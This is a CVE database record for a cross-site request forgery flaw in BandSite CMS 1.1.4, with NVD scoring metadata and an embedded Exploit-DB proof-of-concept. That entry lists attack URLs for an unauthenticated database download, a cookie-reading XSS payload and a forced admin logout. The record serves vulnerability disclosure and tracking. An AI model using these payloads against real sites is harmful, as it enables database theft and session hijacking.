ID CVE-2008-7058
Type cve
Reporter cve@mitre.org
Modified 2017-09-29T01:33:00
Description
Cross-site request forgery (CSRF) vulnerability in BandSite CMS 1.1.4 allows remote attackers to hijack the authentication of administrators and force a logout via adminpanel/logout.php.
{"id": "CVE-2008-7058", "bulletinFamily": "NVD", "title": "CVE-2008-7058", "description": "Cross-site request forgery (CSRF) vulnerability in BandSite CMS 1.1.4 allows remote attackers to hijack the authentication of administrators and force a logout via adminpanel/logout.php.", "published": "2009-08-24T19:30:00", "modified": "2017-09-29T01:33:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7058", "reporter": "cve@mitre.org", "references": ["https://www.exploit-db.com/exploits/6286", "http://www.securityfocus.com/bid/30788", "https://exchange.xforce.ibmcloud.com/vulnerabilities/44589"], "cvelist": ["CVE-2008-7058"], "type": "cve", "lastseen": "2019-05-29T18:09:30", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "26652853d25e8cc09179f24059c9e787"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "e71ee7a4d18757c44f0e10d505087caf"}, {"key": "cpe23", "hash": "bc1bb72aae8b57dcfb602a5bd6173c10"}, {"key": "cvelist", "hash": "9ed25618a7d00d293b09ee952ed1acbb"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "99ddbb5aef5a1da99bb3176e7e6856ad"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "af0af2f5bbde88e770c1690312b27188"}, {"key": "description", "hash": "3127c72966f120b9e648f33b335c3653"}, {"key": "href", "hash": "9857969d4187da1812d413202f0cacee"}, {"key": "modified", "hash": "8e68a47024ac52c01130d0c9914fccda"}, {"key": "published", "hash": "a0cd9bb8135988bb3556c148f2c72dd7"}, {"key": "references", "hash": "c6561dceeed7fbaa8066e72ce3e72a34"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "28613e2274db842f150c95329c3aa685"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "fba90409a69026d8a6e6314bc92719e7317e970f8cb44baedd98b88dc7c79425", "viewCount": 0, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2019-05-29T18:09:30"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:6286"]}], "modified": "2019-05-29T18:09:30"}, "vulnersScore": 6.9}, "objectVersion": "1.3", "cpe": ["cpe:/a:grayscalecms:bandsite_cms:1.1.4"], "affectedSoftware": [{"name": "grayscalecms bandsite_cms", "operator": "eq", "version": "1.1.4"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {}, "cpe23": ["cpe:2.3:a:grayscalecms:bandsite_cms:1.1.4:*:*:*:*:*:*:*"], "cwe": ["CWE-352"]}
{"exploitdb": [{"lastseen": "2016-01-31T23:34:17", "bulletinFamily": "exploit", "description": "BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities. CVE-2008-7056,CVE-2008-7057,CVE-2008-7058. Webapps exploit for php platform", "modified": "2008-08-21T00:00:00", "published": "2008-08-21T00:00:00", "id": "EDB-ID:6286", "href": "https://www.exploit-db.com/exploits/6286/", "type": "exploitdb", "title": "BandSite CMS 1.1.4 Download Backup/XSS/CSRF Remote Vulnerabilities", "sourceData": "###########################################################################\n[+] BandSite CMS 1.1.4 Arbitrary Download Database/XSS/CSRF\n[+] Discovered By SirGod \n[+] www.mortal-team.org \n[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN\n###########################################################################\n\n[+] Arbitrary Download Database\n\nGo to\n\n http://localhost/[Path]/adminpanel/phpmydump.php\n\nand the download will begin ( database.sql ) .\n\n\n[+] Cross Site Scripting\n\n http://localhost/[Path]/merchandise.php?type=[XSS]\n http://localhost/[Path]/merchandise.php?type=<script>alert(document.cookie)</script>\n\n\n[+] Cross Site Request Forgery\n\n If a logged in user with administrator privilegies click the following url he will be logged out.\n\n http://localhost/[Path]/adminpanel/logout.php\n\n\n###########################################################################\n\n# milw0rm.com [2008-08-21]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6286/"}]}